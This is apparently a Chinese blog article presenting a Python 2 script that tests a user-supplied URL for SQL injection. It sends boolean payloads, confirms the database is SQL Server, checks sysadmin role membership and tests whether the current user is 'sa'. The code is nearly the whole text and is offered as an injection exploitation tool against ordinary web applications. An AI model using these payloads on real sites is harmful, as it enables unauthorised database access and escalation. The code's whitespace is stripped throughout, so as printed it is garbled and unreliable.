Python编写检测数据库SA用户的方法
本文讲述一个用Python写的小程序,用于有注入点的链接,以检测当前数据库用户是否为sa,详细代码如下:
#CodebyzhaoxiaobuEmail:little.bu@hotmail.com
#-*-coding:UTF-8-*-
fromsysimportexit
fromurllibimporturlopen
fromstringimportjoin,strip
fromreimportsearch
defis_sqlable():
sql1="%20and%201=2"
sql2="%20and%201=1"
urlfile1=urlopen(url+sql1)
urlfile2=urlopen(url+sql2)
htmlcodes1=urlfile1.read()
htmlcodes2=urlfile2.read()
ifnotsearch(judge,htmlcodes1)andsearch(judge,htmlcodes2):
print"[信息]恭喜!这个URL是有注入漏洞的!n"
print"[信息]现在判断数据库是否是SQLServer,请耐心等候....."
is_SQLServer()
else:
print"[错误]你确定这个URL能用?换个别的试试吧!n"
defis_SQLServer():
sql="%20and%20exists%20(select%20*%20from%20sysobjects)"
urlfile=urlopen(url+sql)
htmlcodes=urlfile.read()
ifnotsearch(judge,htmlcodes):
print"[错误]数据库好像不是SQLServer的!n"
else:
print"[信息]确认是SQLServer数据库!n"
print"[信息]开始检测当前数据库用户权限,请耐心等待......"
is_sysadmin()
defis_sysadmin():
sql="%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"
urlfile=urlopen(url+sql)
htmlcodes=urlfile.read()
ifnotsearch(judge,htmlcodes):
print"[错误]当前数据库用户不具有sysadmin权限!n"
else:
print"[信息]当前数据库用户具有sysadmin权限!n"
print"[信息]检测当前用户是不是SA,请耐心等待......"
is_sa()
defis_sa():
sql="%20and%20'sa'=(select%20System_user)";
urlfile=urlopen(url+sql)
htmlcodes=urlfile.read()
ifnotsearch(judge,htmlcodes):
print"[错误]当前数据库用户不是SA!n"
else:
print"[信息]当前数据库用户是SA!n"
print"n########################################################################n"
print"^o^SQLServer注入利用工具^o^"
print"Email:little.bu@hotmail.comn"
print"========================================================================";
url=raw_input('[信息]请输入一个可能有注入漏洞的链接!nURL:')
ifurl=='':
print"[错误]提供的URL必须具有'.asp?xxx='这样的格式"
exit(1)
judge=raw_input("[信息]请提供一个判断字符串.n判断字符串:")
ifjudge=='':
print"[错误]判断字符串不能为空!"
exit(1)
is_sqlable()